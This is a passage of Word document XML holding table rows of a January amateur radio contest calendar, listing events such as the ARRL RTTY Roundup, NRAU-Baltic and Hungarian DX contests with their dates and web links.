      <w:tr w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w14:paraId="1195D51A" w14:textId="77777777" w:rsidTr="008D7040">
        <w:trPr>
          <w:trHeight w:val="263"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1511" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E0992EA" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>Jan. 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2983" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="305613CB" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t xml:space="preserve">PODSX </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>PSKFest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4861" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71422517" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="0084211F" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId164" w:history="1">
              <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>http://bit.ly/2Qv3wkA</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w14:paraId="72F7E1A1" w14:textId="77777777" w:rsidTr="008D7040">
        <w:trPr>
          <w:trHeight w:val="263"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1511" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C1CEFBB" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>Jan. 8-9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2983" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D25B5FF" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>ARRL RTTY Roundup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4861" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AC3C20A" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="0084211F" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId165" w:history="1">
              <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>www.arrl.org/rtty-roundup</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w14:paraId="09630E1E" w14:textId="77777777" w:rsidTr="008D7040">
        <w:trPr>
          <w:trHeight w:val="263"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1511" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A97E230" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>Jan. 8-9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2983" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FCD194A" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>EUCW 160m Contest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4861" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A4FFB29" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="0084211F" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId166" w:history="1">
              <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>www.eucw.org/eu160.html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w14:paraId="7A10439D" w14:textId="77777777" w:rsidTr="008D7040">
        <w:trPr>
          <w:trHeight w:val="263"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1511" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38214D8C" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>Jan. 8-9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2983" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70A8B39F" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>YB DX Contest SSB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4861" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12FFCAB5" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="0084211F" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId167" w:history="1">
              <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>https://ybdxcontest.com</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w14:paraId="6F08DB7E" w14:textId="77777777" w:rsidTr="008D7040">
        <w:trPr>
          <w:trHeight w:val="263"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1511" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CFED146" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>Jan. 9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2983" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36AF525B" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>DARC 10-Meter Contest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4861" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EF7446C" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="0084211F" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId168" w:history="1">
              <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>http://bit.ly/2pCiRo1</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w14:paraId="33119A1E" w14:textId="77777777" w:rsidTr="008D7040">
        <w:trPr>
          <w:trHeight w:val="263"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1511" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41D95F25" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>Jan. 9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2983" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B23D759" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>NRAU - Baltic SSB Contest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4861" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3909410E" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="0084211F" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId169" w:history="1">
              <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>www.nraubaltic.eu</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w14:paraId="1425945F" w14:textId="77777777" w:rsidTr="008D7040">
        <w:trPr>
          <w:trHeight w:val="263"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1511" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4552372E" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>Jan. 9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2983" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E1BC815" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>NRAU - Baltic CW Contest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4861" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AD7CECF" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="0084211F" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId170" w:history="1">
              <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>www.nraubaltic.eu</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w14:paraId="0B456086" w14:textId="77777777" w:rsidTr="008D7040">
        <w:trPr>
          <w:trHeight w:val="263"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1511" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00B9CAB2" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>Jan. 12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2983" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72A1BB65" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>VHF-UHF FT8 Activity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4861" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="419EFC64" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="0084211F" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId171" w:history="1">
              <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>www.ft8activity.eu/index.php/en</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w14:paraId="0F891E8F" w14:textId="77777777" w:rsidTr="008D7040">
        <w:trPr>
          <w:trHeight w:val="263"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1511" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F94A022" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>Jan. 15-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2983" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03D0460C" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>Hungarian DX Contest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4861" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="681BDA0D" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="0084211F" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId172" w:history="1">
              <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>www.ha-dx.com/en/contest-rules</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w14:paraId="15DF4CD3" w14:textId="77777777" w:rsidTr="008D7040">
        <w:trPr>
          <w:trHeight w:val="263"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1511" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A6614C4" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>Jan. 15-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2983" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59375B40" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">NA CW QSOP </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4861" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BB47AFF" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="0084211F" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId173" w:history="1">
              <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>http://ncjweb.com/naqp</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w14:paraId="5CFFA8A9" w14:textId="77777777" w:rsidTr="008D7040">
        <w:trPr>
          <w:trHeight w:val="263"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1511" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3292F95E" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
